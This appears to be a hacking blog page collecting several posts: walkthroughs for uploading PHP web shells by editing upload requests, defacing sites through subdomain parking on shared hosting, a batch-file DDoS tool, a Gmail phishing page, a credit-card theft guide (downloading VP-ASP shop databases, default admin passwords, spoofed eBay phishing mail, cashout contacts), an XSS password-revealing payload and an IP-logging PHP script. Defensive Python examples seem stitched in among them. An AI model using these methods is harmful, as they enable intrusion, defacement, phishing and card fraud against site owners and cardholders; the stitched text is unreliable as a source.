Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Showing posts with label Website Hacking.

Monday, 17 March 2014

24 Hours Direct Online Tutorial by Admin ( Prince ) on 22 March 2014


The admin is here for u ! 24 hours online tutorial ! The admin that is me , Prince , will be online via facebook , twitter , gmail and link given below for 24 hours. U can contact him personally via those links to get instant reply for those tutorial stated .

Date : 22/3/2014
Time : 00.00 - 00.00 (the next day)

The tutorial consists :
- All OS tips and tweaks (windows/Mac/Linux)
- C++ Programming language
- Beginner Hacking tips
- Software/Games Free download request
Not Included ANY Social Networks Hacking .

U can contact the Admin via :

Facebook Group : https://www.facebook.com/groups/princeTech/
Follow me on twitter : https://twitter.com/mahen_prince
Gmail Address : princemahen@gmail.com
Chatango : http://prince4hack.chatango.com/


Please DON'T make fun out of this . I m doing this for those who need help . Thanks .
This Post will be deleted on the next day . Thanks .

Friday, 8 March 2013

How to upload PHP shell through Firefox Add-on

Many times you get login of a website, but you are unable to upload your PHP shell !
Today I'll show you how to upload your PHP shell through Tamper Data, a Firefox add-on.

Install Tamper Data firefox add-on:
Download Tamper Data CLICK HERE
Now Install it and Restart Firefox

Rename shell:
Note: You have to rename your .php shell to .jpg to bypass the website's security.
To upload a shell, of course you need an upload option in the login page or anywhere!

Demo:
As an example i'll take - http://freead1.net/post-free-ad-to-USA-42

It is a free classified ads posting website, so i got a upload option there !
Find your upload option, click on browse, locate your .jpg shell and select it!



Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window !


Before Clicking on Upload button click on "Start Tamper" in Tamper Data window..
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser

Now click on upload button !

After clicking on upload button "Tamper with request?" window will appear !
Click on "Tamper" button


After a click on "Tamper" you will see "Tamper Popup"
In Tamper Popup Window, Copy "POST_DATA" text in Notepad


After copying it to Notepad, find "yourshell.jpg" and rename it to .php.

Now copy Notepad's text back to "POST_DATA" field..and click OK
It will Upload the shell as .php and you can execute it easily !
Find your .php shell & do whatever you wanted with that website
that's all !

Saturday, 16 February 2013

How to upload Shell by Live HTTP Headers

Today I will tell you how to upload shell through Live HTTP Headers.

Requirements:-

  • Mozilla Firefox
  • Live HTTP Headers Add On for Firefox 
  • A shell
So now lets begin,

  1. Login to that site as a admin, then find a place to upload a file in that particular site.
  2. Then rename your shell name to shell.php.jpg (or what ever that site supports. In my case, site supports only jpg file. Thats why i renamed it to shell.php.jpg.)
  3. Then start your Live HTTP Headers addon, after that upload your shell.
  4. Then your Live HTTP Headers will look something similar to this

  5. Then click on the shell.php.jpg, after click on Reply button.
  6. Then again a new window will open, in that window there will be two boxes, but we have to work on second box :D.
  7. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button.

Now you have successfully done, only thing you have to do is to find the shell path.

This is for educational purposes only. I'll not be responsible for any illegal work done by you.
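
Both upload posts above depend on the server taking the stored file name from the `filename` field of the request, which can be edited after the upload form has accepted a .jpg. An added example, not code from the original posts: a server-side handler in Python that ignores the client-supplied name and type, decides the extension from the file's leading bytes, and writes under a random name. `store_upload`, `UploadRejected` and the sample bodies are hypothetical names and constructed data.

```python
import os
import secrets
import tempfile

# Leading-byte signatures of the only types this hypothetical site accepts.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Secondary heuristic only: markers an image has no reason to contain.
SCRIPT_MARKERS = (b"<?php", b"<script")
MAX_BYTES = 2 * 1024 * 1024


class UploadRejected(Exception):
    """Raised when an upload fails server-side validation."""


def sniff_type(data):
    """Return the extension implied by the leading bytes, or None."""
    for ext, magics in SIGNATURES.items():
        if data.startswith(magics):
            return ext
    return None


def store_upload(client_filename, client_content_type, data, upload_dir):
    """Validate an upload and store it under a server-chosen name.

    client_filename and client_content_type are request fields the sender
    controls; they are never used to build the stored path or extension.
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    ext = sniff_type(data)
    if ext is None:
        raise UploadRejected("content is not an accepted image type")
    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        raise UploadRejected("image carries embedded script markers")
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    path = os.path.join(upload_dir, stored_name)
    # O_EXCL: never overwrite an existing file; 0o640: no execute bit.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return stored_name


def demo():
    # Constructed sample bodies (not real images, not real shells).
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
    script_only = b"<?php /* placeholder body */ ?>"
    polyglot = jpeg + b"<?PHP /* placeholder body */ ?>"
    results = {}
    with tempfile.TemporaryDirectory() as upload_dir:
        # Each request claims filename "shell.php" and type "image/jpeg".
        cases = {"renamed": jpeg, "script": script_only, "polyglot": polyglot}
        for label, body in cases.items():
            try:
                results[label] = store_upload(
                    "shell.php", "image/jpeg", body, upload_dir)
            except UploadRejected as exc:
                results[label] = f"rejected: {exc}"
        results["stored"] = sorted(os.listdir(upload_dir))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Serve the upload directory from a location where the web server does not execute scripts, so that a file that slips past these checks is still delivered as static data.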

Hack Thousands Of Website In 000webhost With DNS Hijacking

So let me Introduce the DNS Hijacking trick making millions of Websites hosted on 000webhost and other free hosting webhosting companies vulnerable.


Step 1 : Login with a free account on 000webhost.com
it will give you a address like abcd.something.com
mine was --> http://testingfu.comule.com




now go to cpanel
now open bing.com and search for like
" ip:31.170.163.140 .gov "or ” ip:31.170.163.140 .edu

all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253

Server 2 with with 253 ips
31.170.162.1 - 31.170.162.253

Server 3 with 242 ips
31.170.163.1 - 31.170.163.241

now the target i got is csirt.gov.bd

i just open this url :
abcd.csirt.gov.bd


a error page of 000webhost strikes



which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost

now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :
men.csirt.gov.bd
bd.csirt.gov.bd

and done added a index page to my public_html and the website defaced .
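
The parking step above succeeds when a zone keeps records that send hostnames to a shared host where no account of the zone owner has claimed them. An added example (not from the original post) of a zone audit in Python that flags such records; the networks are the /24s containing the ranges listed in the post, while the zone data, `example.org` and the `CLAIMED` set are constructed.

```python
import ipaddress

# The /24 networks containing the shared-hosting ranges listed in the post.
SHARED_HOSTING_NETS = [
    ipaddress.ip_network(n)
    for n in ("31.170.161.0/24", "31.170.162.0/24", "31.170.163.0/24")
]

# Constructed zone data for a hypothetical domain.
SAMPLE_ZONE = """
@     3600 IN A 31.170.163.140   ; main site, claimed in our hosting account
www   3600 IN A 31.170.163.140   ; claimed in our hosting account
old   3600 IN A 31.170.162.17    ; site was deleted, record was left behind
*     3600 IN A 31.170.161.9     ; catch-all
mail  3600 IN A 192.0.2.25       ; our own server, not shared hosting
"""

# Hostnames that are actually configured in our own hosting account.
CLAIMED = {"example.org", "www.example.org"}


def parse_zone(text, origin):
    """Parse 'name ttl IN type rdata' lines into (fqdn, type, rdata)."""
    records = []
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop comments
        parts = line.split()
        if len(parts) != 5 or parts[2].upper() != "IN":
            continue
        name, _ttl, _cls, rtype, rdata = parts
        fqdn = origin if name == "@" else f"{name}.{origin}"
        records.append((fqdn.lower(), rtype.upper(), rdata))
    return records


def audit(records, claimed):
    """Flag A records that point at shared hosting without a claimed site.

    'wildcard': every name under it reaches the shared host, so any
                unclaimed label can be claimed by another tenant.
    'dangling': a specific name points at the shared host but no site of
                ours is configured for it there.
    """
    findings = []
    for fqdn, rtype, rdata in records:
        if rtype != "A":
            continue
        ip = ipaddress.ip_address(rdata)
        if not any(ip in net for net in SHARED_HOSTING_NETS):
            continue
        if fqdn.startswith("*."):
            findings.append((fqdn, rdata, "wildcard"))
        elif fqdn not in claimed:
            findings.append((fqdn, rdata, "dangling"))
    return findings


if __name__ == "__main__":
    for fqdn, ip, kind in audit(parse_zone(SAMPLE_ZONE, "example.org"), CLAIMED):
        print(f"{kind:9} {fqdn} -> {ip}")
```

Each finding is resolved by deleting the record or by pointing it at infrastructure where the hostname is bound to the zone owner's account.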

Saturday, 15 December 2012

Create Own DDOS Tools Using Notepad (Prince)




Here I just wanted to share knowledge with you how to make
application DDOS (Distributed Denial of Service) with the help of a batch file ..
We need to do the following:

1.Open Notepad

2.Copy this script into notepad

DOWNLOAD script from here . 

3.Save as batchfile.Example : DDOS.bat


How to Use

On-Target Server input menu
web address / Ip your friend that you want to DDOS
for example like this:


Right 2 click to open that batch file..

Get in victim site

Get victim ip

And then input the results of the ping IP in the host and
Packet Size for it to send the number of bytes to be
Size (size up to you)

then press "ENTER"

If u face any problem on that , pls do let me know by comment or via Facebook .


Thursday, 6 December 2012

SQLite Expert Professional v3.4.41 Portable | Full version | 42.8 Mb






SQLite Expert: A powerful administration tool for your SQLite databases
Are you developing SQLite3 databases and need an easy and powerful tool? SQLite Expert is the perfect choice. It is the most feature rich administration and development tool for SQLite. SQLite Expert is designed to answer the needs of all users, from writing simple SQL queries to developing complex databases.
The graphical interface supports all SQLite features. It includes a visual query builder, an SQL editor with syntax highlighting and code completion, visual table and view designers and powerful import and export capabilities.
Supported platforms: Windows 2000, XP, Vista, 7.
November 25, 2012: Version 3.4.41. build 2263
Fixed encoding issue when importing data from text files.



Friday, 30 November 2012

How To Make Phishing Site ? Easy Tutorial




PrinceMahen here. Today i am going to show you a quick tutorial on how to make a Gmail phishing ( Fake Login Page ) site.Phishing is a fake login page of a particular site which captures email and password of the victim when he type it in the form. After capturing it would send all the information to hacker's webhosting.

1) Goto free webhosting, if you have paid then you have to use that. I would recommend http://www.000webhost.com/order.php



2) Signup for free! after that goto your email for confirmation and sign in.


3) When you are logged in, Go to Cpanel, after that go to File manager for the creation of phishing page.



4) The menu will display now go to Public_html.




5) Now click upload, and upload the files to the hosting.




6) That's it, you are done! Now goto your domain and you will see it would same like gmail login page. Send the link to your friends and Enjoy hacking.
To see the input information of your phishing page ( I mean your victim's email and password ).
Go to :- http://www.yoursitesadress.p4o.net/lol.html

Download the phishing page From Here



Note - This file and its contents are only for educational purposes. Please do not misuse them.The author is not responsible in any way for your act.By using this you accept with the disclaimer.

Thursday, 29 November 2012

Largest Collection Of Google Dorks Ever Complied By PrinceMahen






Hi , I m PrinceMahen gonna share a large compilation Of Google Dorks ever made by website defacers..
Kindly download below .txt file through mediafire link given .. Thank you..





Saturday, 24 November 2012

HOW TO HACK A CREDIT CARD !!!!!!!




HELLO WORLD IM DAVIDREX IS HERE FOR A NICE AND USEFUL TRICKS:
LETS START.......


THIS TUTORIAL IS DIVIDED IN TWO PARTS.
INTRODUCTION INTO CREDIT CARDS
CREDIT CARD HACKING

NOTE: HACKING CREDIT CARDS IS AN ILLEGAL ACT, THIS IS ONLY INFORMATIONAL POST AND WE NOT RESPONSIBLE FOR ANY ACTIONS DONE BY YOU AFTER READING THIS TUTORIAL. THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.

LETS START WITH SOME EASY TERMS.

WHAT IS CREDIT CARD ?

CREDIT CARDS ARE OF TWO TYPES:
DEBIT CARD
CREDIT CARD
1. DEBIT MEANS U HAVE A SUM OF AMOUNT IN IT AND U CAN USE THEM.
2. CREDIT MEANS U HAVE A CREDIT LINE LIMIT LIKE OF $10000 AND U CAN USE THEM AND BY THE END OF MONTH PAY IT TO BANK.

TO USE A CREDIT CARD ON INTERNET U JUST NOT NEED CC NUMBER AND EXPIRY BUT U NEED MANY INFO LIKE :
FIRST NAME
LAST NAME
ADDRESS
CITY
STATE
ZIP
COUNTRY
PHONE
CC NUMBER
EXPIRY
CVV2 ( THIS IS 3DIGIT SECURITY CODE ON BACKSIDE AFTER SIGNATURE PANEL )
IF YOU GET THAT INFO YOU CAN USE THAT TO BUY ANY THING ON INTERNET, LIKE SOFTWARE LICENSE, PORN SITE MEMBERSHIP, PROXY MEMBERSHIP, OR ANY THING (ONLINE SERVICES USUALLY, LIKE WEBHOSTING, DOMAINS).

IF U WANT TO MAKE MONEY $ THROUGH HACKING THEN YOU NEED TO BE VERY LUCKY... YOU NEED TO HAVE A EXACT BANK AND BIN TO CASH THAT CREDIT CARD THROUGH ATM MACHINES.

LET ME EXPLAIN HOW ?

FIRST STUDY SOME SIMPLE TERMS.

BINS = FIRST 6 DIGIT OF EVERY CREDIT CARD IS CALLED " BIN " (FOR EXAMPLE CC NUMBER IS : 4121638430101157 THEN ITS BIN IS " 412163 "), I HOPE THIS IS EASY TO UNDERSTAND.

NOW THE QUESTION IS HOW TO MAKE MONEY THROUGH CREDIT CARDS. ITS STRANGE..., WELL YOU CANT DO THAT, BUT THERE IS SPECIFIC PERSONS IN WORLD WHO CAN DO THAT. THEY CALL THEM SELVES " CASHIERS ". YOU CAN TAKE SOME TIME TO FIND A RELIABLE CASHIERS.

NOW THE QUESTION IS EVERY BANK CREDIT CARDS ARE CASHABLE AND EVERY BIN IS CASHABLE? LIKE CITIBANK, BANK OF AMERICA , MBNA .. ARE ALL BANKS ARE CASHABLES ? WELL ANSWER IS " NO ". IF U KNOW SOME THING, A LITTLE THING ABOUT BANKING SYSTEM, HAVE U EVER HEARD WHAT IS ATM MACHINES? WHERE U WITHDRAW UR CASH BY PUTTING UR CARD IN.
EVERY BANK DON'T HAVE ATM, EVERY BANK DON'T SUPPORT ATM MACHINES CASHOUT. ONLY FEW BANKS SUPPORT WITH THEIR FEW BINS (AS U KNOW BIN IS FIRST 6 DIGIT OF ANY CREDIT / DEBIT CARD NUMBER), FOR SUPPOSE BANK OF AMERICA. THAT BANK NOT HAVE ONLY 1 BIN, THAT BANK IS ASSIGNED LIKE, 412345 412370 ARE UR BINS U CAN MAKE CREDIT CARDS ON THEM. SO BANK DIVIDE THE COUNTRY CITI LOCATION WISE, LIKE FROM 412345 - 412360 IS FOR AMERICANS, AFTER THAT FOR OUTSIDERS AND LIKE THIS. I HOPE U UNDERSTAND. SO ALL BINS OF THE SAME BANK ARE EVEN NOT CASHABLE, LIKE FOR SUPPOSE THEY SUPPORT ATM IN NEW YORK AND NOT IN CALIFORNIA, SO LIKE THE BINS OF CALIFORNIA OF SAME BANK WILL BE UNCASHABLE. SO ALWAYS MAKE SURE THAT THE BINS AND BANKS ARE 100% CASHABLE IN MARKET BY MANY CASHIERS.

BE SURE CASHIERS ARE LEGIT, BECAUSE MANY CASHIERS R THERE WHICH TAKE YOUR CREDIT CARD AND RIP U OFF AND DON'T SEND YOUR 50% SHARE BACK.
YOU CAN ALSO FIND SOME CASHIERS ON MIRC *( /SERVER IRC.UNIXIRC.NET:6667 ) CHANNEL : #CASHOUT, #CCPOWER

WELL, CHECK THE WEBSITE WHERE U HAVE LIST OF BINS AND BANKS MOSTLY 101% CASHABLE. IF U GET THE CREDIT CARD OF THE SAME BANK WITH SAME BIN, THEN U CAN CASHOUT OTHERWISE NOT . REMEMBER FOR USING CREDIT CARD ON INTERNET U DON'T NEED PIN ( 4 WORDS PASSWORD WHICH U ENTER IN ATM MACHINE ), BUT FOR CASHOUT U NEED. YOU CAN GET PINS ONLY BY 2ND METHOD OF HACKING WHICH I STILL NOT POST BUT I WILL. FIRST METHOD OF SQL INJECTION AND SHOPADMIN HACKING DON'T PROVIDE WITH PINS, IT ONLY GIVE CC NUMB CVV2 AND OTHER INFO WHICH USUALLY NEED FOR SHOPPING NOT FOR CASHING.

CREDIT CARD HACKING

CC (CREDIT CARDS) CAN BE HACKED BY TWO WAYS:
CREDIT CARD SCAMS ( USUALLY USED FOR EARNING MONEY , SOME TIMES FOR SHOPPING )
CREDIT CARD SHOPADMIN HACKING ( JUST FOR FUN, KNOWLEDGE, SHOPPING ON INTERNET )
1. SHOPADMIN HACKING

THIS METHOD IS USED FOR TESTING THE KNOWLEDGE OR FOR GETTING THE CREDIT CARD FOR SHOPPING ON INTERNET, OR FOR FUN, OR ANY WAY BUT NOT FOR CASHING ( BECAUSE THIS METHOD DON'T GIVE PIN - 4 DIGIT PASSCODE ) ONLY GIVES CC NUMB , CVV2 AND OTHER BASIC INFO.

SHOPADMINS ARE OF DIFFERENT COMPANIES, LIKE: VP-ASP , X CART, ETC. THIS TUTORIAL IS FOR HACKING VP-ASP SHOP.

I HOPE U SEEN WHENEVER U TRY TO BUY SOME THING ON INTERNET WITH CC, THEY SHOW U A WELL PROGRAMMED FORM, VERY SECURE. THEY ARE CARTS, LIKE VP-ASP XCARTS. SPECIFIC SITES ARE NOT HACKED, BUT CARTS ARE HACKED.

BELOW I'M POSTING TUTORIAL TO HACK VP ASP CART. NOW EVERY SITE WHICH USE THAT CART CAN BE HACKED, AND THROUGH THEIR *MDB FILE U CAN GET THEIR CLIENTS 'CREDIT CARD DETAILS', AND ALSO LOGIN NAME AND PASSWORD OF THEIR ADMIN AREA, AND ALL OTHER INFO OF CLIENTS AND COMAPNY SECRETS.

LETS START:

TYPE: VP-ASP SHOPPING CART
VERSION: 5.00

HOW TO FIND VP-ASP 5.00 SITES?

FINDING VP-ASP 5.00 SITES IS SO SIMPLE...

1. GO TO GOOGLE.COM AND TYPE: VP-ASP SHOPPING CART 5.00
2. YOU WILL FIND MANY WEBSITES WITH VP-ASP 5.00 CART SOFTWARE INSTALLED

NOW LET'S GO TO THE EXPLOIT..

THE PAGE WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPDISPLAYCATEGORIES.ASP
THE EXPLOIT IS: DIAG_DBTEST.ASP
NOW YOU NEED TO DO THIS: ****://***.VICTIM.COM/SHOP/DIAG_DBTEST.ASP

A PAGE WILL APPEAR CONTAIN THOSE:
XDATABASE
SHOPPING140
XDBLOCATION
RESX
XDATABASETYPEXEMAILXEMAIL NAMEXEMAILSUBJECTXEMAILSY STEMXEMAILTYPEXORDERNUMBE R
EXAMPLE:

THE MOST IMPORTANT THING HERE IS XDATABASE
XDATABASE: SHOPPING140

OK, NOW THE URL WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPPING140.MDB

IF YOU DIDN'T DOWNLOAD THE DATABASE, TRY THIS WHILE THERE IS DBLOCATION:
XDBLOCATION
RESX
THE URL WILL BE: ****://***.VICTIM.COM/SHOP/RESX/SHOPPING140.MDB

IF U SEE THE ERROR MESSAGE YOU HAVE TO TRY THIS :
****://***.VICTIM.COM/SHOP/SHOPPING500.MDB

DOWNLOAD THE MDB FILE AND YOU SHOULD BE ABLE TO OPEN IT WITH ANY MDB FILE VIEWER, YOU SHOULD BE ABLE TO FIND ONE AT DOWNLOAD.COM, OR USE MS OFFICE ACCESS.
INSIDE YOU SHOULD BE ABLE TO FIND CREDIT CARD INFORMATION, AND YOU SHOULD EVEN BE ABLE TO FIND THE ADMIN USERNAME AND PASSWORD FOR THE WEBSITE.

THE ADMIN LOGIN PAGE IS USUALLY LOCATED HERE: ****://***.VICTIM.COM/SHOP/SHOPADMIN.ASP

IF YOU CANNOT FIND THE ADMIN USERNAME AND PASSWORD IN THE MDB FILE OR YOU CAN BUT IT IS INCORRECT, OR YOU CANNOT FIND THE MDB FILE AT ALL, THEN TRY TO FIND THE ADMIN LOGIN PAGE AND ENTER THE DEFAULT PASSWORDS WHICH ARE:
USERNAME: ADMIN
PASSWORD: ADMIN
OR
USERNAME: VPASP
PASSWORD: VPASP
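
For defenders running this cart, the requests described above are easy to spot in access logs. An added example, not part of the original post: a Python scan over combined-format log lines (constructed, with documentation IP addresses) that flags a served `diag_dbtest.asp` page and any `.mdb` file returned with status 200, raising the severity when the same client requested the diagnostic page first.

```python
import re
from collections import defaultdict

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed access-log lines; paths follow the ones named in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Nov/2012:10:01:02 +0000] "GET /shop/shopdisplaycategories.asp HTTP/1.1" 200 8123',
    '203.0.113.7 - - [24/Nov/2012:10:01:09 +0000] "GET /shop/diag_dbtest.asp HTTP/1.1" 200 1410',
    '203.0.113.7 - - [24/Nov/2012:10:01:15 +0000] "GET /shop/shopping140.mdb HTTP/1.1" 404 0',
    '203.0.113.7 - - [24/Nov/2012:10:01:21 +0000] "GET /shop/resx/shopping140.mdb HTTP/1.1" 200 4194304',
    '198.51.100.4 - - [24/Nov/2012:11:30:00 +0000] "GET /shop/shopping500.mdb HTTP/1.1" 403 0',
    '198.51.100.4 - - [24/Nov/2012:11:30:04 +0000] "GET /shop/diag_dbtest.asp HTTP/1.1" 404 0',
]


def classify(path):
    """Map a request path to the kind of probe it represents, if any."""
    p = path.split("?", 1)[0].lower()
    if p.endswith("/diag_dbtest.asp"):
        return "diag_probe"
    if p.endswith(".mdb"):
        return "mdb_request"
    return None


def scan(lines):
    """Return (client, severity, message) alerts in log order per client."""
    per_client = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        kind = classify(m["path"])
        if kind:
            per_client[m["ip"]].append((kind, int(m["status"]), m["path"]))

    alerts = []
    for ip, events in per_client.items():
        probed = False
        for kind, status, path in events:
            if kind == "diag_probe":
                probed = True
                if status == 200:
                    alerts.append((ip, "medium", f"diagnostic page exposed: {path}"))
            elif status == 200:
                # The database itself left the server; worse if the client
                # had already asked the diagnostic page for its name.
                severity = "critical" if probed else "high"
                alerts.append((ip, severity, f"database file served: {path}"))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The durable fix is to remove the diagnostic page and keep the database file outside the web root, so that both requests return 404.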


2. HACKING THROUGH SCAMS

THIS METHOD IS USUALLY USED TO HACK FOR EARNING MONEY. WHAT HAPPENS IN THIS METHOD IS YOU CREATE A CLONE PAGE.

TARGET: ITS BASICALLY EBAY.COM OR PAYPAL.COM FOR GENERAL CREDIT CARDS, OR IF U WANT TO TARGET ANY SPECIFIC CASHABLE BANK LIKE REGIONBANK.COM THEN U HAVE TO CREATE A CLONE PAGE FOR THAT BANK.

WHAT IS EBAY.COM?

ITS A SHOPPING SITE WORLD WIDE WHICH IS USED BY MANY OF BILLION PEOPLE WHICH USE THEIR CREDIT CARDS ON EBAY. WHAT YOU DO MAKE A SIMILAR PAGE SAME AS EBAY AND UPLOAD IT ON SOME HOSTING WHICH DON'T HAVE ANY LAW RESTRICTIONS, TRY TO FIND HOSTING IN EUROPE THEY WILL MAKE YOUR SCAM UP FOR LONG TIME, AND EMAIL THE USERS OF EBAY.

HOW TO GET THE EMAILS OF THEIR USERS?

GO TO GOOGLE.COM AND TYPE "EMAIL HARVESTOR" OR ANY EMAIL SPIDER AND SEARCH FOR EBAY BUYERS AND EBAY SELLERS AND U WILL GET LONG LIST. THAT LIST IS NOT ACCURATE BUT OUT OF 1000 ATLEAST 1 EMAIL WOULD BE VALID. ATLEAST YOU WILL GET SOME TIME.

WELL U CREATE A CLONE PAGE OF EBAY, AND MAIL THE LIST U CREATE FROM SPIDER WITH MESSAGE, LIKE "YOUR ACCOUNT HAS BEEN HACKED" OR ANY REASON THAT LOOKS PROFESSIONAL, AND ASK THEM TO VISIT THE LINK BELOW AND ENTER YOUR INFO BILLING, AND THE SCAM PAGE HAVE PROGRAMMING WHEN THEY ENTER THEIR INFO IT COMES DIRECTLY TO YOUR EMAIL.
IN THE FORM PAGE U HAVE PIN REQUIRED SO U ALSO GET THE PIN NUMBER THROUGH WHICH U CAN CASH THROUGH ATM ..

NOW IF U RUN EBAY SCAM OR PAYPAL SCAM, ITS UP TO YOUR LUCK WHO'S YOUR VICTIM. A CLIENT OF BANK OF AMERICA OR OF CITIBANK OR OF REGION, ITS ABOUT LUCK, MAYBE U GET CASHABLE, MAY BE U DON'T ITS JUST LUCK, NOTHING ELSE.

SEARCH ON GOOGLE TO DOWNLOAD A SCAM SITE AND STUDY IT !

AFTER YOU CREATE YOUR SCAM SITE, JUST FIND SOME EMAIL HARVESTOR OR SPIDER FROM INTERNET (DOWNLOAD GOOD ONE AT BULK EMAIL SOFTWARE SUPERSTORE - EMAIL MARKETING INTERNET ADVERTISING) AND CREATE A GOOD EMAIL LIST.

AND YOU NEED TO FIND A MAILER (MASS SENDING MAILER) WHICH SEND MASS - EMAILS TO ALL EMAILS WITH THE MESSAGE OF UPDATING THEIR ACCOUNT ON UR SCAM PAGE ). IN FROM TO, USE EMAIL EBAY@REPLY3.EBAY.COM AND IN SUBJECT USE : EBAY - UPDATE YOUR EBAY ACCOUNT AND IN NAME USE EBAY

SOME INSTRUCTIONS:

1. MAKE SURE YOUR HOSTING REMAINS UP OR THE LINK IN THE EMAIL U WILL SEND, AND WHEN YOUR VICTIM EMAILS VISIT IT, IT WILL SHOW PAGE CANNOT BE DISPLAYED, AND YOUR PLAN WILL BE FAILED.
2. HARDEST POINT IS TO FIND HOSTING WHICH REMAINS UP IN SCAM. EVEN I DON'T FIND IT EASILY, ITS VERY VERY HARD PART.
3. MAYBE U HAVE CONTACTS WITH SOMEONE WHO OWN HOSTING COMPANY AND CO LOCATIONS OR DEDICATED HE CAN HIDE YOUR SCAM IN SOME OF DEDICATED WITHOUT RESTRICTIONS.
4. FINDING A GOOD EMAIL LIST (GOOD MEANS = ACTUALLY USERS)
5. YOUR MASS MAILING SOFTWARE LAND THE EMAILS IN INBOX OF USERS.

Friday, 23 November 2012

CROSS SITE SCRIPTING



Cross-site scripting attacks are now mostly referred to as XSS attacks. Many websites have been found with XSS vulnerabilities, including Yahoo, YouTube and other popular sites. An XSS attack is possible when a website has an XSS vulnerability.
It took me months to decipher what this attack is really about. Even when I was reading books on it, I felt I was seeing Latin. Anyway now I’ve understood a whole lot about XSS attacks and how they work. It is very simple and interesting and I believe you won’t just get what I will give you here in handy anywhere.
What is an XSS attack?
This attack is also known as code injection, and from that we can infer that an XSS attack is the exploitation of web servers by inserting code into their web pages; the inserted script then runs in the browser of whoever views the page. It was formerly called CSS as an acronym for cross-site scripting, but I think because of the existence of CSS as cascading style sheets, it was changed to XSS, where the "X" represents a cross. Most often, people use the search box to do this. In an XSS-vulnerable website, when code like <script>alert('you are vulnerable to XSS');</script> is inserted, a dialog box appears showing "you are vulnerable to XSS". If this can be done, then the other XSS exploitations can be carried out on that website too.
A few years back, the Yahoo website was vulnerable to this attack. Then we hackers would simply inject the JavaScript below into the address bar:
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
This was used to reveal the password behind the asterisks for anyone who had used his/her email account in that browser on that computer.
A scenario of how it works: Jeffrey uses his PC to check his Yahoo account and then logs out. Because Jeffrey had checked the "remember me" box on the Yahoo login page, the page shows his email and his password as asterisks or big black dots. Once the script above is pasted into the address bar, Jeffrey's password is displayed to me in a dialog box. This was used for a long time before Yahoo fixed the error. You may still find tutorials on how to hack Yahoo accounts with this strategy, but here I am telling you that it is stale and can't work anymore.
I don't know much about how it happened with YouTube, but I know I've heard several times about XSS vulnerabilities found in YouTube.
There is a lot more you can do with XSS, which I will explain in later posts, so I will just list some other ways a cross-site scripting attack can be used.
- It can be used to make cookie grabbers: with cross-site scripting, you can pretend to be a website and steal cookies from some internet users.
- It can be used to deface web pages.
- It can be used for phishing.
To find an XSS vulnerability in a website, you can use vulnerability scanners like Acunetix and JSky, and there are many others. You can even write your own program to find these vulnerabilities.


Wednesday, 21 November 2012

GET IP ADRESS OF YOUR FRIENDS USING PHP(1000 % WORKING)


HELLO DAVIDREX BACK GOING TO TEACH YOU HOW TO GET IP ADRESS OF SOMENONE USING PHP ............ (SOOO SIMPLE)
# ONLY 3 STEPS

1) COPY THE CODE BELOW AND PASTE IT IN THE NOTEPAD(code must be the same) :


<?php
$ip = $_SERVER['REMOTE_ADDR'];
$open = fopen('logs.html' , 'a+');
$fwrite = fwrite($open , $ip.'<hr />');
$fclose = fclose($open);
header('Location: https://www.facebook.com/best4hack');
?>

2) NOW SAVE THAT AS INDEX.PHP. 

3) THEN GO TO ANY FREEE WEBHOSTING SITE AND SIGNUP.

4) GO TO FILES > FILE MANAGER 1 > AND UPLOAD THE CODE(INDEX.PHP) THAT U SAVED EARLIER....

5) NOW SEND THAT DOMAIN THAT YOU REGISTER AND UPLOAD THE CODE TO YOUR FRIEND... IF HE CLICK THAT, AUTOMATICLLY U WILL GET THE IP ADRESS IN THE LOGS HTML.

#HAVE ANY PROBLEM FEEL FREE TO COMMENT AND ASK .... GOOD BAI 
VISIT OUR BLOG DAILY....

Tuesday, 20 November 2012

The best hacking tools collection



Prince Mahen again ... Here, I have collected some of the best hacking tools for you. They are listed below:

Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat
